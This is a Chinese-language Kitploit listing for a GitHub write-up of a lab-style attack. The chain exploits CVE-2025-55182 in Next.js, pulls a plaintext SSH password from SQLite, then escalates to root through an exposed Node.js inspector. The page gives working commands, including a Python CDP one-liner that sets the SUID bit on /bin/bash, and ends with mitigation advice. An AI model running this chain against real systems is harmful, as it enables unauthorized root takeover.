Skip to content
KitploitKITPLOIT
工具漏洞利用博客
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182 — 针对 CVE-2025-55182 在 Next.js 中的利用、从 SQLite 中窃取凭据,以及通过 Node.js inspector 进行权限提升以实现 root 访问的技术渗透测试报告。 | Kitploit
工具/GitHubGitHub/chrisbarack/cve-2025-55182
权限提升侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubchrisbarack/cve-2025-55182

cve-2025-55182

针对 CVE-2025-55182 在 Next.js 中的利用、从 SQLite 中窃取凭据,以及通过 Node.js inspector 进行权限提升以实现 root 访问的技术渗透测试报告。

查看仓库
721天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

渗透测试报告:Next.js RCE 与 Node.js Inspector 权限提升

本技术报告详细描述了攻陷托管易受攻击的 Next.js Web 应用目标的利用路径,通过窃取的凭据实现初始访问,并利用配置错误的本地 Node.js V8 inspector 实现 root 权限提升。

第一阶段:外部侦察与 Web 利用

初始信息收集

目标托管了一个运行在标准 HTTP/HTTPS 端口(80/443)上的 Next.js Web 应用。标准目录枚举和手动分析表明,该应用运行的版本易受 CVE-2025-55182 影响。

通过 Burp Suite 进行利用

为利用该漏洞,请使用 Burp Suite(或 Burp Repeater)拦截应用流量,并注入针对 CVE-2025-55182 的精心构造的利用载荷。

数据库发现

通过利用实现代码执行和本地文件读取后,检查应用源码目录。本地 SQLite 数据库文件(database.db)位于主应用源码旁。

第二阶段:提取凭据与初始访问

检查数据库

查询或导出数据库文件内容,以提取存储的用户记录。

root@kitploit:~
sqlite3 database.db "SELECT * FROM users;"

凭据提取

找到与本地 SSH 用户 engineer 关联的明文密码。

SSH 登录

使用恢复的凭据与目标机器建立 SSH 会话:

root@kitploit:~
ssh engineer@<TARGET-IP>

获取用户 Flag

认证成功后,读取位于主目录中的用户 flag:

root@kitploit:~
cat /home/engineer/user.txt

第三阶段:通过 Node.js Inspector 进行权限提升

内部端口侦察

检查仅绑定到本地回环接口(127.0.0.1)的服务,以识别内部攻击面:

root@kitploit:~
netstat -tulnp

结果:一个内部 Node.js 服务正在本地端口 9229 上监听。

发现调试器 UUID

Node.js V8 调试端口需要唯一的会话 UUID 才能进行 WebSocket 通信。使用 curl 并附加 /json 查询本地发现端点:

root@kitploit:~
curl -s http://127.0.0.1:9229/json

输出:

root@kitploit:~
{
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/46a680a0-1cf5-4af4-9ce6-474f77329639"
}

执行权限提升载荷

由于目标 Node.js 进程以 root 权限运行,您可以通过 Python 经 WebSocket 发送 Chrome DevTools 协议(CDP)Runtime.evaluate 消息,为 /bin/bash 设置 SUID 位:

root@kitploit:~
python3 -c 'import websocket, json; ws = websocket.create_connection("ws://127.0.0.1:9229/<YOUR-UUID>"); ws.send(json.dumps({"id": 1, "method": "Runtime.evaluate", "params": {"expression": "process.mainModule.require(\"child_process\").execSync(\"chmod +s /bin/bash\")"}})); print(ws.recv()); ws.close()'

进入 Root Shell

确认 /bin/bash 现已启用 SUID 权限(-rwsr-sr-x),然后以保留权限的方式调用 Bash:

root@kitploit:~
ls -l /bin/bash
bash -p

获取 Root Flag

导航至 root 用户的主目录以获取最终 flag:

root@kitploit:~
cd /root
cat root.txt

要防范这些攻击向量,需要修补易受已知 CVE 影响的 Web 应用、正确限制数据库文件权限,并确保调试端口(如 9229 端口上的 Node.js inspector)在生产环境中绝不暴露或未经认证即可访问。

下载工具